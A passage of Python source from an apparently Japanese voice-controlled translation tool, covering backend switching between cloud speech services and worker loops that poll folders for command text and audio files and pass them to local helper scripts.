speechtext = u'ja,hoya,既にデフォルト設定で処理中です。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
else:
speechtext = u'ja,hoya,デフォルト設定に移行します。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
qLangTrn = 'en'
qLangOut = qLangTrn[:2]
qApiInp = 'free'
qApiTrn = 'free'
qApiOut = 'free'
if (qOS == 'windows'):
qApiOut = 'winos'
if (qOS == 'darwin'):
qApiOut = 'macos'
useApi = qApiInp
speechtext = u'音声認識機能と翻訳機能は、グーグルクラウドプラットホームのAIで処理します。'
control_speech('01', fileId, runMode, micDev, useApi, useApi, qLangInp, qLangOut, speechtext, )
if (qApiOut == 'winos'):
speechtext = u'音声合成機能は、WINDOWSのOSで処理します。'
elif (qApiOut == 'macos'):
speechtext = u'音声合成機能は、MacのOSで処理します。'
else:
speechtext = u'音声合成機能も、グーグルクラウドプラットホームのAIで処理します。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'よろしくお願いします。'
control_speech('03', fileId, runMode, micDev, qApiTrn, 'free', qLangInp, qLangOut, speechtext, False)
control_speech('04', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, False)
if (procText == 'special') and (locked_ai == False):
if (qApiInp == 'google') and (qApiTrn == 'azure') and (qApiOut == 'watson') \
and (qLangOut == 'en') and (qLangTrn[:2] == qLangOut):
speechtext = u'ja,hoya,既にスペシャル設定で処理中です。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
else:
speechtext = u'ja,hoya,スペシャル設定に移行します。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
qLangTrn = 'en'
qLangOut = qLangTrn[:2]
qApiInp = 'google'
qApiTrn = 'azure'
qApiOut = 'watson'
useApi = qApiInp
speechtext = u'こんにちは。私はグーグルクラウドプラットホームのAIです。'
control_speech('01', fileId, runMode, micDev, useApi, useApi, qLangInp, qLangOut, speechtext, )
speechtext = u'音声認識機能は、グーグルクラウドプラットホームのAIが処理します。'
control_speech('02', fileId, runMode, micDev, useApi, useApi, qLangInp, qLangOut, speechtext, )
useApi = qApiTrn
speechtext = u'こんにちは。私はマイクロソフトのクラウドAI「azure」です。'
control_speech('03', fileId, runMode, micDev, useApi, useApi, qLangInp, qLangOut, speechtext, )
speechtext = u'機械翻訳機能は、マイクロソフトのクラウドAI「azure」が処理します。'
control_speech('04', fileId, runMode, micDev, useApi, useApi, qLangInp, qLangOut, speechtext, )
useApi = qApiOut
speechtext = u'こんにちは。私はIBMのクラウドAI「WATSON」です。'
control_speech('05', fileId, runMode, micDev, useApi, useApi, qLangInp, qLangOut, speechtext, )
speechtext = u'音声合成機能は、IBMのクラウドAI「WATSON」が処理します。'
control_speech('06', fileId, runMode, micDev, useApi, useApi, qLangInp, qLangOut, speechtext, )
speechtext = u'よろしくお願いします。'
control_speech('07', fileId, runMode, micDev, qApiInp, qApiInp, qLangInp, qLangOut, speechtext, False)
control_speech('08', fileId, runMode, micDev, qApiTrn, qApiTrn, qLangInp, qLangOut, speechtext, False)
control_speech('09', fileId, runMode, micDev, qApiOut, qApiOut, qLangInp, qLangOut, speechtext, False)
if (procText == 'google') and (locked_ai == False):
if (qApiInp == 'google') and (qApiTrn == qApiInp) and (qApiOut == qApiInp) \
and (qLangOut == 'en') and (qLangTrn[:2] == qLangOut):
speechtext = u'ja,hoya,既にグーグルクラウドプラットホームのAIで処理中です。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
else:
speechtext = u'ja,hoya,グーグルクラウドプラットホームのAIに移行します。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
qLangTrn = 'en'
qLangOut = qLangTrn[:2]
qApiInp = 'google'
qApiTrn = 'google'
qApiOut = 'google'
speechtext = u'こんにちは。私はグーグルクラウドプラットホームのAIです。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声認識機能、機械翻訳機能、音声合成機能は、グーグルクラウドプラットホームのAIが処理します。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'よろしくお願いします。'
control_speech('03', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == 'ibm' or procText == 'watson') and (locked_ai == False):
if (qApiInp == 'watson') and (qApiTrn == qApiInp) and (qApiOut == qApiInp) \
and (qLangOut == 'en') and (qLangTrn[:2] == qLangOut):
speechtext = u'ja,hoya,既にIBMのクラウドAI「WATSON」で処理中です。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
else:
speechtext = u'ja,hoya,IBMのクラウドAI「WATSON」に移行します。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
qLangTrn = 'en'
qLangOut = qLangTrn[:2]
qApiInp = 'watson'
qApiTrn = 'watson'
qApiOut = 'watson'
speechtext = u'こんにちは。私はIBMのクラウドAI「WATSON」です。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声認識機能、機械翻訳機能、音声合成機能は、クラウドAI「WATSON」が処理します。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'よろしくお願いします。'
control_speech('03', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == 'microsoft' or procText == 'azure' or procText == 'azur') and (locked_ai == False):
if (qApiInp == 'azure') and (qApiTrn == qApiInp) and (qApiOut == qApiInp) \
and (qLangOut == 'en') and (qLangTrn[:2] == qLangOut):
speechtext = u'ja,hoya,既にマイクロソフトのクラウドAI「azure」で処理中です。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
else:
speechtext = u'ja,hoya,マイクロソフトのクラウドAI「azure」に移行します。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
qLangTrn = 'en'
qLangOut = qLangTrn[:2]
qApiInp = 'azure'
qApiTrn = 'azure'
qApiOut = 'azure'
speechtext = u'こんにちは。私はマイクロソフトのクラウドAI「azure」です。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声認識機能、機械翻訳機能、音声合成機能は、クラウドAI「azure」が処理します。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'よろしくお願いします。'
control_speech('03', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if ((procText == 'nict') or (procText == 'n i c t')) and (locked_ai == False):
if (qApiInp == 'nict') and (qApiTrn == qApiInp) and (qApiOut == qApiInp) \
and (qLangOut == 'en') and (qLangTrn[:2] == qLangOut):
speechtext = u'ja,hoya,既に情報通信研究機構「NICT」のクラウドAIで処理中です。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
else:
speechtext = u'ja,hoya,情報通信研究機構「NICT」のクラウドAIに移行します。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
#qLangTrn = 'en,fr,es,id,my,th,vi,zh,ko,'
#qLangTrn = 'en,fr,es,id,zh,ko,'
qLangTrn = 'en'
qApiInp = 'nict'
qApiTrn = 'nict'
qApiOut = 'nict'
speechtext = u'こんにちは。私は国立法人の情報通信研究機構「NICT」のクラウドAIです。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声認識機能、機械翻訳機能、音声合成機能は、「NICT」のクラウドAIが処理します。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'よろしくお願いします。'
control_speech('03', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if ((procText == 'contest') or (procText == 'contests')
or (procText == 'contesting possession')) \
and (locked_ai == False):
if (qApiInp == 'google') and (qApiTrn == 'nict') \
and ((qApiOut == 'watson') or (qApiOut == 'winos') or (qApiOut == 'macos')) \
and (qLangOut == 'en') and (qLangTrn[:2] == qLangOut):
speechtext = u'ja,hoya,既にPOCコンテストモードで処理中です。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
else:
speechtext = u'ja,hoya,POCコンテストモードに移行します。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
#qLangTrn = 'en,fr,es,id,my,th,vi,zh,ko,'
#qLangTrn = 'en,fr,es,id,zh,ko,'
qLangTrn = 'en,fr,zh,ko,'
qLangOut = qLangTrn[:2]
qApiInp = 'google'
qApiTrn = 'nict'
qApiOut = 'watson'
if (qOS == 'windows'):
qApiOut = 'winos'
if (qOS == 'darwin'):
qApiOut = 'macos'
speechtext = u'こんにちは。私は国立法人の情報通信研究機構「NICT」のクラウドAIです。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'機械翻訳機能は、「NICT」のクラウドAIが処理します。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声認識機能は、グーグルクラウドプラットホームのAIが処理します。'
control_speech('03', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声合成機能は、WINDOWSのOSが処理します。'
control_speech('04', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == 'presentation') and (locked_ai == False):
if (qApiInp == 'google') and (qApiTrn == 'nict') \
and (qApiOut == 'none') \
and (qLangOut == 'en') and (qLangTrn[:2] == qLangOut):
speechtext = u'ja,hoya,既にプレゼンテーションモードで処理中です。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
else:
speechtext = u'ja,hoya,プレゼンテーションモードに移行します。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
#qLangTrn = 'en,fr,es,id,my,th,vi,zh,ko,'
#qLangTrn = 'en,fr,es,id,zh,ko,'
qLangTrn = 'en,fr,zh,ko,'
qLangOut = qLangTrn[:2]
qApiInp = 'google'
qApiTrn = 'nict'
qApiOut = 'nict'
speechtext = u'こんにちは。私は国立法人の情報通信研究機構「NICT」のクラウドAIです。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'機械翻訳機能は、「NICT」のクラウドAIが処理します。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声認識機能は、グーグルクラウドプラットホームのAIが処理します。'
control_speech('03', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声合成機能は、停止します。'
control_speech('04', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'プレゼンテーションの準備OKです。スタンバイしています。'
control_speech('04', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
qApiOut = 'none'
if ((procText == 'docomo')) and (locked_ai == False):
if (qApiInp == 'docomo'):
speechtext = u'ja,hoya,既に「ドコモ」の音声認識機能で処理中です。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
else:
speechtext = u'ja,hoya,「ドコモ」の音声認識機能に移行します。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
qLangTrn = 'en'
qLangOut = qLangTrn[:2]
qApiInp = 'docomo'
qApiOut = 'free'
if (qOS == 'windows'):
qApiOut = 'winos'
if (qOS == 'darwin'):
qApiOut = 'macos'
speechtext = u'こんにちは。私は「ドコモ」のクラウドAIです。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声認識機能は、「ドコモ」のクラウドAIが処理します。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'よろしくお願いします。'
control_speech('03', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if ((procText == 'winos') or (procText == 'windows')) and (qOS == 'windows') and (locked_ai == False):
if (qApiOut == 'winos'):
speechtext = u'ja,hoya,既にWINDOWSのOSの音声合成機能で処理中です。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
else:
speechtext = u'ja,hoya,WINDOWSのOSの音声合成機能に移行します。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
qLangTrn = 'en'
qLangOut = qLangTrn[:2]
qApiOut = 'winos'
speechtext = u'こんにちは。私はWINDOWSのOSです。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声合成機能は、WINDOWSのOSが処理します。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'よろしくお願いします。'
control_speech('03', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if ((procText == 'macos') or (procText == 'osx')) and (qOS == 'darwin') and (locked_ai == False):
if (qApiOut == 'macos'):
speechtext = u'ja,hoya,既にMACのOSの音声合成機能で処理中です。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
else:
speechtext = u'ja,hoya,MACのOSの音声合成機能に移行します。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
qLangTrn = 'en'
qLangOut = qLangTrn[:2]
qApiOut = 'macos'
speechtext = u'こんにちは。私はMACのOSです。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声合成機能は、MACのOSが処理します。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'よろしくお願いします。'
control_speech('03', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == 'audio stop') or (procText == 'voice stop'):
if (qApiOut == 'none'):
speechtext = u'ja,hoya,既に音声合成機能は停止中です。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
else:
speechtext = u'ja,hoya,音声合成機能を停止します。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
qApiOut = 'none'
if ((procText == 'ai test') or (procText == 'api test')) and (locked_ai == False):
qApiInp = 'docomo'
qApiTrn = 'free'
qApiOut = 'hoya'
speechtext = u'ja,hoya,新しいクラウドAIのテストモードに移行します。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声認識機能は、docomoのクラウドAIが処理します。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声合成機能は、HOYAのクラウドAIが行います。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'残念ながら日本語英語しか話せません。'
control_speech('03', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, 'ja', speechtext, )
speechtext = u'よろしくお願いします。'
control_speech('04', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, 'ja', speechtext, )
qLangTrn = 'ja'
qLangOut = qLangTrn[:2]
# Shared state for the speech-control worker (proc_control); read by
# external watchdogs to monitor thread health.
control_start = 0      # time.time() when proc_control started
control_beat = 0       # timestamp of the most recent loop iteration
control_busy = False   # True while a control file is being processed
control_last = 0       # timestamp of the last executed control text
control_seq = 0        # rolling job sequence number (wraps at 10000)
# control_web = False  # (disabled) web-control flag
def proc_control(cn_r, cn_s, ):
    """Speech-control worker loop.

    Receives the startup parameters (runMode, micDev, micType, micGuide) one
    by one from the request queue ``cn_r``, announces startup by voice (live
    microphone mode only), then polls the ``qPathCtrl`` folder for recognized
    command-text files and executes each one via ``control_sub()``.

    Replies on ``cn_s``: ``['PASS', '']`` for keep-alive messages,
    ``['OK'/'NG', '']`` after each scan, ``['END', '']`` when a shutdown
    phrase is spoken.  Runs until a ``None`` message arrives on ``cn_r``.
    """
    global qOS
    global qPathCtrl
    global qPathInp
    global qPathWav
    global qPathSTT
    global qPathTTS
    global qPathTRA
    global qPathPlay
    global qPathRec
    global qPathWork
    global qBusyCtrl
    global qBusyInput
    global qBusySTT
    global qBusyTTS
    global qBusyPlay
    global control_start
    global control_beat
    global control_busy
    global control_last
    global control_seq
    global control_web
    qLogOutput('speechCtrl:init')
    # Startup handshake: four parameters arrive on the request queue.
    runMode  = cn_r.get()
    micDev   = cn_r.get()
    micType  = cn_r.get()
    micGuide = cn_r.get()
    cn_r.task_done()
    qLogOutput('speechCtrl:runMode =' + str(runMode ))
    qLogOutput('speechCtrl:micDev =' + str(micDev ))
    qLogOutput('speechCtrl:micType =' + str(micType ))
    qLogOutput('speechCtrl:micGuide=' + str(micGuide))
    qLogOutput('speechCtrl:start')
    control_start=time.time()
    if (str(micDev) != 'file'):
        # Live-microphone mode: mark the controller busy and announce startup.
        qBusySet(qBusyCtrl, True)
        qBusyCheck(qBusyPlay , 3)
        if (micType == 'bluetooth') or (micGuide == 'on' or micGuide == 'sound'):
            qBusyCheck(qBusyInput , 3)
        speechtext = u'こんにちは。' + runMode + u'機能を起動しました。'
        control_speech('00', 'control', runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
        if (str(micDev) != 'file') and (runMode=='handsfree'):
            speechtext = '翻訳機能を起動しました。'
            control_speech('01', 'control', runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
        if (micType == 'bluetooth'):
            speechtext = micType + u'マイク制御機能を起動しました。'
            control_speech('11', 'control', runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
        else:
            speechtext = micType + u'マイク制御機能を起動しました。'
            control_speech('11', 'control', runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
        speechtext = u'全ての機能が並列処理で起動しました。'
        control_speech('12', 'control', runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
        speechtext = u'連続した音声入力が使用できます。'
        control_speech('13', 'control', runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
    # Kick off the companion vision/playback workers, then give the whole
    # process tree time to come up before declaring readiness.
    speechtext = u'vision start'
    control_sub( '21', 'control', runMode, micDev, speechtext, 'en', )
    speechtext = u'play start'
    control_sub( '22', 'control', runMode, micDev, speechtext, 'en', )
    time.sleep(20.00)
    if (str(micDev) != 'file'):
        speechtext = u'全ての準備が整いました。スタンバイしています。'
        control_speech('88', 'control', runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
        qBusySet(qBusyCtrl, False)
    # De-duplication memory: the last executed text and its language.
    lasttext = ''
    lastlang = ''
    while (True):
        control_beat = time.time()    # heartbeat for external watchdogs
        if (cn_r.qsize() > 0):
            cn_r_get = cn_r.get()
            mode_get = cn_r_get[0]
            data_get = cn_r_get[1]
            cn_r.task_done()
            if (mode_get is None):
                # None is the shutdown signal from the parent.
                qLogOutput('speechCtrl:None=break')
                break
            if (cn_r.qsize() > 1) or (cn_s.qsize() > 1):
                qLogOutput('speechCtrl: queue overflow warning!, ' + str(cn_r.qsize()) + ', ' + str(cn_s.qsize()))
            if (mode_get == 'PASS'):
                cn_s.put(['PASS', ''])
            else:
                control_busy = True
                result = 'OK'
                path = qPathCtrl
                files = glob.glob(path + '*')
                if (len(files) > 0):
                    try:
                        for f in files:
                            file=f.replace('\\', '/')
                            # Claim each .txt via a rename round-trip
                            # (.txt -> .tmp.txt -> .txt) so that concurrent
                            # pollers cannot pick up the same file.
                            if (file[-4:].lower() == '.txt' and file[-8:].lower() != '.tmp.txt'):
                                f1=file
                                f2=file[:-4] + '.tmp.txt'
                                try:
                                    os.rename(f1, f2)
                                    file=f2
                                except:
                                    pass
                            if (file[-8:].lower() == '.tmp.txt'):
                                f1=file
                                f2=file[:-8] + file[-4:]
                                try:
                                    os.rename(f1, f2)
                                    file=f2
                                except:
                                    pass
                            fileId = file.replace(path, '')
                            fileId = fileId[:-4]
                            # Rolling 4-digit sequence number (0001..9999).
                            control_seq += 1
                            if (control_seq >= 10000):
                                control_seq = 1
                            seq4 = '{:04}'.format(control_seq)
                            seq2 = seq4[-2:]
                            wrkfile = qPathWork + 'control.' + seq2 + '.txt'
                            if (os.path.exists(wrkfile)):
                                try:
                                    os.remove(wrkfile)
                                except:
                                    pass
                            # Read the whole control file into one
                            # whitespace-normalized line of text.
                            txt = ''
                            try:
                                rt = codecs.open(file, 'r', 'utf-8')
                                for t in rt:
                                    txt = (txt + ' ' + str(t)).strip()
                                rt.close()    # BUGFIX: was 'rt.close' (no call) — handle was never closed
                                rt = None
                            except:
                                rt = None
                            # Infer the language from the filename suffix.
                            lang = ''
                            if (file[-7:] == '.ja.txt'):
                                lang = 'ja'
                            if (file[-21:] == '.en.stt.translate.txt'):
                                lang = 'en'
                            os.remove(file)
                            txt = str(txt).strip()
                            if (txt != '' and txt != '!'):
                                if (txt == lasttext and lang == lastlang):
                                    # Same text as last time: skip (echo suppression).
                                    if (runMode == 'debug'):
                                        qLogOutput('speechCtrl:(pass)' + txt + '(' + lang + ')')
                                else:
                                    lasttext=txt
                                    lastlang=lang
                                    if (runMode == 'debug'):
                                        qLogOutput('speechCtrl:(exec)' + txt + '(' + lang + ')')
                                    # Copy the text into the work file consumed
                                    # by the sendmessage helper.
                                    try:
                                        w = codecs.open(wrkfile, 'w', 'utf-8')
                                        w.write(txt)
                                        w.close()
                                        w = None
                                    except:
                                        w = None
                                    if (os.path.exists(wrkfile)):
                                        control_last = time.time()
                                        if (qOS == 'windows'):
                                            # Forward the text to other windows (fire-and-forget).
                                            sendkey = subprocess.Popen(['python', '_speech_a3_sendmessage.py', wrkfile, ], )
                                    if (runMode=='debug') or (runMode=='handsfree'):
                                        # Demo phrase: reset everything to defaults first.
                                        if (txt == u'デモ紹介') or (txt == u'デモンストレーション'):
                                            speechtext = u'reset'
                                            control_sub( '00', 'control', runMode, micDev, speechtext, 'en', )
                                            speechtext = u'default'
                                            control_sub( '01', 'control', runMode, micDev, speechtext, 'en', )
                                            time.sleep( 3.00)
                                    if (runMode=='debug') or (runMode=='handsfree'):
                                        # Shutdown phrase: announce before executing it.
                                        if (txt == u'システム終了' or txt == u'バルス'):
                                            speechtext = u'システム終了プロセスを開始しました。'
                                            control_speech('90', 'control', runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
                                            time.sleep( 3.00)
                                    # Execute the control text itself.
                                    control_sub(seq4, fileId, runMode, micDev, txt, lang, )
                                    if (runMode=='debug') or (runMode=='handsfree'):
                                        if (txt == u'システム終了' or txt == u'バルス'):
                                            # Say goodbye, notify the parent, stop scanning.
                                            speechtext = runMode + u'機能を終了しました。'
                                            control_speech('91', 'control', runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
                                            time.sleep(10.00)
                                            speechtext = u'さようなら。また、よろしくお願いします。'
                                            control_speech('99', 'control', runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
                                            cn_s.put(['END', ''])
                                            time.sleep( 5.00)
                                            break
                    except:
                        result = 'NG'
                cn_s.put([result, ''])
                control_busy = False
                qBusySet(qBusyCtrl, False)
        # Idle pacing: poll slower when the request queue is empty.
        if (cn_r.qsize() == 0):
            time.sleep(0.25)
        else:
            time.sleep(0.10)
    qLogOutput('speechCtrl:terminate')
    # Drain any messages left on the request queue before exiting.
    while (cn_r.qsize() > 0):
        try:
            cn_r_get = cn_r.get()
            mode_get = cn_r_get[0]
            data_get = cn_r_get[1]
            cn_r.task_done()
        except:
            pass
    qLogOutput('speechCtrl:end')
def stt_sub(seq, fileId, runMode, micDev, file, ):
    """Dispatch one captured audio file to the recognition pipeline.

    Builds the input/output file routing for the '_speech_a3_all_api.py'
    helper according to ``runMode`` (recognize, optionally translate and
    synthesize), then launches the helper as a background subprocess.

    In file (batch) mode every 10th job (``seq`` ending in '0') is awaited
    synchronously so subprocesses do not pile up.
    """
    global qApiInp
    global qApiTrn
    global qApiOut
    global qLangInp
    global qLangTrn
    global qLangTxt
    global qLangOut
    global qPathCtrl
    global qPathInp
    global qPathWav
    global qPathSTT
    global qPathTTS
    global qPathTRA
    global qPathPlay
    global qPathRec
    global qPathWork
    # BUGFIX: safe defaults so an unrecognized runMode cannot raise
    # NameError at the Popen call below (previously these names were only
    # bound inside the runMode-specific branches).
    inpInput = ''
    inpOutput= ''
    trnInput = ''
    trnOutput= ''
    txtInput = ''
    txtOutput= ''
    outInput = ''
    outOutput= ''
    inpPlay  = 'off'
    txtPlay  = 'off'
    outPlay  = 'off'
    if (runMode == 'handsfree') or (runMode == 'translator'):
        # Recognize -> translate -> synthesize the translated text.
        inpInput = file
        inpOutput= qPathSTT + fileId + '.' + qLangInp + '.txt'
        trnInput = inpOutput
        trnOutput= qPathTRA + fileId + '.' + qLangInp + '.' + qLangTrn[:2] + '.stt.translate.txt'
        outInput = trnOutput
        outOutput= qPathPlay + fileId + '.' + qLangOut + '.voice.mp3'
    if (runMode == 'debug') or (runMode == 'learning'):
        # As above, plus speak back the recognized text ("feedback").
        inpInput = file
        inpOutput= qPathSTT + fileId + '.' + qLangInp + '.txt'
        trnInput = inpOutput
        trnOutput= qPathTRA + fileId + '.' + qLangInp + '.' + qLangTrn[:2] + '.stt.translate.txt'
        txtInput = inpOutput
        txtOutput= qPathPlay + fileId + '.' + qLangOut + '.feedback.mp3'
        outInput = trnOutput
        outOutput= qPathPlay + fileId + '.' + qLangOut + '.voice.mp3'
        qLangTxt = qLangInp
    if (runMode == 'speech') or (runMode == 'number'):
        # Recognition only; translate as well when reading from a live mic.
        inpInput = file
        inpOutput= qPathSTT + fileId + '.' + qLangInp + '.txt'
        if (micDev != 'file'):
            trnInput = inpOutput
            trnOutput= qPathTRA + fileId + '.' + qLangInp + '.' + qLangTrn[:2] + '.stt.translate.txt'
    if (qApiOut == 'none'):
        # Speech synthesis disabled: suppress the audio outputs.
        txtOutput= ''
        outOutput= ''
    api = subprocess.Popen(['python', '_speech_a3_all_api.py', \
        runMode, micDev, qApiInp, qApiTrn, qApiOut, qLangInp, qLangTrn, qLangTxt, qLangOut, \
        'STT'+str(seq), fileId, inpInput, inpOutput, trnInput, trnOutput, txtInput, txtOutput, outInput, outOutput, \
        inpPlay, txtPlay, outPlay, ], \
        )
    time.sleep(3.00)
    if (str(micDev) == 'file'):
        if (seq[-1:] == '0'):
            # Batch mode: wait on every 10th job to bound process fan-out.
            api.wait()
            api.terminate()
            api = None
            time.sleep(20.00)
# Shared state for the speech-to-text worker (proc_sttcore); read by
# external watchdogs to monitor thread health.
sttcore_start = 0      # time.time() when proc_sttcore started
sttcore_beat = 0       # timestamp of the most recent loop iteration
sttcore_busy = False   # True while an audio file is being processed
sttcore_last = 0       # timestamp of the last recognition job
sttcore_seq = 0        # rolling job sequence number (wraps at 10000)
def proc_sttcore(cn_r, cn_s, ):
    """Speech-to-text worker loop.

    Handshake: reads runMode, micDev, micType and micGuide one by one from
    the request queue ``cn_r``, then polls the ``qPathWav`` folder for
    recorded audio.  Each .wav/.mp3 file is claimed via a rename round-trip,
    resampled to 16 kHz / 16 bit / mono with sox into a per-sequence work
    file, and handed to ``stt_sub()`` for recognition.

    Replies on ``cn_s``: ``['PASS', '']`` for keep-alive messages,
    ``['OK'/'NG', '']`` after each scan in microphone mode, and
    ``['END'/'ERROR', '']`` followed by thread exit in file (batch) mode.
    Terminates when a ``None`` message arrives on ``cn_r``.
    """
    global qPathCtrl
    global qPathInp
    global qPathWav
    global qPathSTT
    global qPathTTS
    global qPathTRA
    global qPathPlay
    global qPathRec
    global qPathWork
    global qBusyCtrl
    global qBusyInput
    global qBusySTT
    global qBusyTTS
    global qBusyPlay
    global sttcore_start
    global sttcore_beat
    global sttcore_busy
    global sttcore_last
    global sttcore_seq
    qLogOutput('stt_core__:init')
    # Startup handshake: four parameters arrive on the request queue.
    runMode  = cn_r.get()
    micDev   = cn_r.get()
    micType  = cn_r.get()
    micGuide = cn_r.get()
    cn_r.task_done()
    qLogOutput('stt_core__:runMode =' + str(runMode ))
    qLogOutput('stt_core__:micDev =' + str(micDev ))
    qLogOutput('stt_core__:micType =' + str(micType ))
    qLogOutput('stt_core__:micGuide=' + str(micGuide))
    qLogOutput('stt_core__:start')
    sttcore_start=time.time()
    while (True):
        sttcore_beat = time.time()    # heartbeat for external watchdogs
        if (cn_r.qsize() > 0):
            cn_r_get = cn_r.get()
            mode_get = cn_r_get[0]
            data_get = cn_r_get[1]
            cn_r.task_done()
            if (mode_get is None):
                # None is the shutdown signal from the parent.
                qLogOutput('stt_core__:None=break')
